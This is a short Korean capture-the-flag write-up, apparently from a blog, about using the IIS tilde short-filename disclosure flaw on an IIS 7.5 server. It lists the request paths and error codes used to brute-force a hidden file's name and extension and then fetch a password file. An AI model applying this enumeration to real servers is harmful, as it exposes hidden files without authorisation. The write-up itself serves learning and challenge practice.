Web1 서버는 iis 7.5버전이 설치되어 있었고 ‘This website has been attacked. So, password link is missing now’ 즉, 패스워드 링크를 찾는게 문제였기에 IIS Short File/Foder Name Disclosure 라는 취약점으로 삽질을 했다.
관련 문서 : http://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf
/ip/admin/*~1*/.aspx 로 접속했을때 Error Code 0x00000000 가 뜨는것으로 보아 admin디렉토리에 1개 이상의 파일이나 폴더가 존재한다는것을 알 수 있었고
/ip/a*~1*/.aspx
/ip/b*~1*/.aspx
/ip/c*~1*/.aspx 처럼 한 글자씩 bruteforce해서 파일이나 폴더의 이름이 iisvul~ 라는것을 알아냈다.
/ip/admin/iisvul*~1/.aspx 로 접속했을때 Error Code 0x80070002 가 뜨는것으로 보아 iisvul~ 는 디렉토리가 아니라 확장자를 가지는 파일이라는 것을 알 수 있었다.
/ip/admin/iisvul*~1.%3f%3f%3f/.aspx 가 Error Code 0x00000000 이므로 iisvul~ 의 확장자는 3 글자였고,
/ip/admin/iisvul*~1.a%3f%3f/.aspx
/ip/admin/iisvul*~1.b%3f%3f/.aspx
/ip/admin/iisvul*~1.c%3f%3f/.aspx 로 bruteforce해서 확장자가 txt임을 알아냈다.
그러므로 admin 디렉토리에는 이름이 iisvul로 시작하는 txt파일이 존재한다는 것을 알 수 있었고 iisvulnerability.txt 로 접속해서 Password를 얻어냈다.